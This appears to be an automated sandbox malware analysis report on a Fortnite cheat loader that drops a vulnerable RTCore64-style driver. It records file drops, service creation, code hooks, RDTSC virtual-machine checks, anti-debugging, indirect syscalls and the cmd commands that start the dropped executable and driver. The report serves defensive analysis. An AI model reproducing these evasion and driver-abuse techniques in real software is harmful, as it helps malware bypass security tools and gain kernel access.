Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb33 source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbK source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb_ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb!x source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb!y source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5n source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1 source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbYz source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb)y source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\ioctl base updated by redshirtfan\build\driver\driver.pdb source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798931127.00000245E10C0000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr
Source: Binary string: win32k.pdbGCTL source: Vulnerability.exe, 00000004.00000003.1879106664.000002181DBE1000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C225000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb@ source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1041000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1797006532.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: win32k.pdb source: Vulnerability.exe, 00000004.00000003.1879106664.000002181DBE1000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C225000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols4b74f1f14570c9cf7868ff6d4bda773.pdb - unmatched source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5zs source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb7 source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbm]g source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880187140.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb1y. source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ddhttps://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ConnectionKeep-Alive/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c9cf7868ff6d4bda773.pdbv source: Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb;k source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbFranciscw source: Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb\ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
Source: lUAc7lqa56.exeStatic PE information: section name: _RDATA
Source: lUAc7lqa56.exeStatic PE information: section name: .vmp0
Source: lUAc7lqa56.exeStatic PE information: section name: .vmp1

Persistence and Installation Behavior

barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\Vulnerability.exeJump to behavior
Sample is not signed and drops a device driver
Source: C:\Users\user\Desktop\lUAc7lqa56.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sysJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeFile created: C:\Windows\driverfo.sysJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeFile created: C:\Windows\Vulnerability.exeJump to dropped file
Source: C:\Users\user\Desktop\lUAc7lqa56.exeFile created: C:\Windows\driverfo.sysJump to dropped file
Source: C:\Users\user\Desktop\lUAc7lqa56.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sysJump to dropped file
Source: C:\Users\user\Desktop\lUAc7lqa56.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exeJump to dropped file
Source: C:\Windows\Vulnerability.exeFile created: C:\Users\user\AppData\Local\Temp\nULoYBmSWbJump to dropped file
Source: C:\Users\user\Desktop\lUAc7lqa56.exeFile created: C:\Windows\Vulnerability.exeJump to dropped file
Source: C:\Users\user\Desktop\lUAc7lqa56.exeFile created: C:\Windows\driverfo.sysJump to dropped file
Source: C:\Windows\Vulnerability.exeFile created: C:\Users\user\AppData\Local\Temp\nULoYBmSWbJump to dropped file
Source: C:\Windows\Vulnerability.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\nULoYBmSWbJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\Desktop\lUAc7lqa56.exeMemory written: PID: 2256 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeMemory written: PID: 2256 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeMemory written: PID: 2256 base: 7FFE2238000D value: E9 BB CB EB FF Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeMemory written: PID: 2256 base: 7FFE2223CBC0 value: E9 5A 34 14 00 Jump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\lUAc7lqa56.exeRDTSC instruction interceptor: First address: 7FF7909B8B5C second address: 7FF7909B8B85 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 movzx eax, dx 0x00000006 inc ecx 0x00000007 rol bl, 1 0x00000009 inc cx 0x0000000b movsx eax, bl 0x0000000e dec eax 0x0000000f cdq 0x00000010 inc ecx 0x00000011 add bl, 0000006Ah 0x00000014 inc ecx 0x00000015 xor bl, 00000033h 0x00000018 inc ecx 0x00000019 cmp ah, FFFFFFD7h 0x0000001c inc ecx 0x0000001d sub bl, 0000004Eh 0x00000020 dec eax 0x00000021 cwde 0x00000022 dec eax 0x00000023 bsf edx, esp 0x00000026 inc ecx 0x00000027 xor dh, bl 0x00000029 rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exeRDTSC instruction interceptor: First address: 7FF7908F5097 second address: 7FF7908F50CA instructions: 0x00000000 rdtsc 0x00000002 neg eax 0x00000004 inc ecx 0x00000005 not ch 0x00000007 inc ecx 0x00000008 pop edi 0x00000009 inc ecx 0x0000000a and ch, FFFFFFEEh 0x0000000d inc ecx 0x0000000e pop esi 0x0000000f rcl ebp, cl 0x00000011 inc ecx 0x00000012 pop ebp 0x00000013 dec eax 0x00000014 add ebx, esp 0x00000016 mov cx, di 0x00000019 pop ecx 0x0000001a inc ecx 0x0000001b pop edx 0x0000001c stc 0x0000001d inc cx 0x0000001f sar ecx, FFFFFFA2h 0x00000022 popfd 0x00000023 lahf 0x00000024 mov dl, D2h 0x00000026 pop ebp 0x00000027 inc ecx 0x00000028 pop ebx 0x00000029 cwd 0x0000002b inc ebp 0x0000002c xchg ah, al 0x0000002e cbw 0x00000030 pop esi 0x00000031 inc ecx 0x00000032 pop eax 0x00000033 rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exeRDTSC instruction interceptor: First address: 7FF79039C244 second address: 7FF79039C26D instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 movzx eax, dx 0x00000006 inc ecx 0x00000007 rol bl, 1 0x00000009 inc cx 0x0000000b movsx eax, bl 0x0000000e dec eax 0x0000000f cdq 0x00000010 inc ecx 0x00000011 add bl, 0000006Ah 0x00000014 inc ecx 0x00000015 xor bl, 00000033h 0x00000018 inc ecx 0x00000019 cmp ah, FFFFFFD7h 0x0000001c inc ecx 0x0000001d sub bl, 0000004Eh 0x00000020 dec eax 0x00000021 cwde 0x00000022 dec eax 0x00000023 bsf edx, esp 0x00000026 inc ecx 0x00000027 xor dh, bl 0x00000029 rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exeRDTSC instruction interceptor: First address: 7FF790348D7E second address: 7FF790348DA1 instructions: 0x00000000 rdtsc 0x00000002 inc esp 0x00000003 xor dl, dl 0x00000005 inc ecx 0x00000006 pop esp 0x00000007 pop ebp 0x00000008 mov di, 74EBh 0x0000000c popfd 0x0000000d inc ecx 0x0000000e mov dl, 73h 0x00000010 inc ecx 0x00000011 pop edi 0x00000012 dec eax 0x00000013 cmovs eax, ebp 0x00000016 inc ecx 0x00000017 pop ecx 0x00000018 inc cx 0x0000001a bswap eax 0x0000001c inc ecx 0x0000001d pop ebx 0x0000001e pop ecx 0x0000001f dec ecx 0x00000020 movzx esi, si 0x00000023 rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exeRDTSC instruction interceptor: First address: 7FF7903F0928 second address: 7FF7903F0946 instructions: 0x00000000 rdtsc 0x00000002 inc ebp 0x00000003 bsr ecx, esi 0x00000006 inc ecx 0x00000007 pop ecx 0x00000008 popfd 0x00000009 cwde 0x0000000a cbw 0x0000000c movzx ebp, dx 0x0000000f pop edi 0x00000010 dec esp 0x00000011 movzx ebx, dx 0x00000014 cwde 0x00000015 inc ecx 0x00000016 xchg eax, ebx 0x00000017 pop ecx 0x00000018 cwde 0x00000019 inc ebp 0x0000001a xchg al, dh 0x0000001c inc ecx 0x0000001d pop esp 0x0000001e rdtsc
Tries to evade analysis by execution special instruction (VM detection)
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSpecial instruction interceptor: First address: 7FF79089AE37 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSpecial instruction interceptor: First address: 7FF79089AE4F instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC4214C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle,4_2_00007FF7CC4214C0
Source: C:\Users\user\Desktop\lUAc7lqa56.exeDropped PE file which has not been started: C:\Windows\driverfo.sysJump to dropped file
Source: C:\Users\user\Desktop\lUAc7lqa56.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sysJump to dropped file
Source: C:\Windows\Vulnerability.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nULoYBmSWbJump to dropped file
Source: C:\Windows\System32\timeout.exe TID: 4856Thread sleep count: 37 > 30Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC423B60 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,4_2_00007FF7CC423B60
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1041000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1042000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881188072.000002181DB2B000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB2B000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1050000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1050000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\lUAc7lqa56.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect debuggers (CloseHandle check)
Source: C:\Users\user\Desktop\lUAc7lqa56.exeHandle closed: DEADC0DE
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC424B58 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7CC424B58
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC4214C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle,4_2_00007FF7CC4214C0
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC421630 SetUnhandledExceptionFilter,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,__std_fs_code_page,memcmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF7CC421630
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC424B58 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7CC424B58
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC4243B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF7CC4243B8
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC424D00 SetUnhandledExceptionFilter,4_2_00007FF7CC424D00

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Desktop\lUAc7lqa56.exeNtProtectVirtualMemory: Indirect: 0x7FF79041E09EJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driverfo.sysJump to behavior
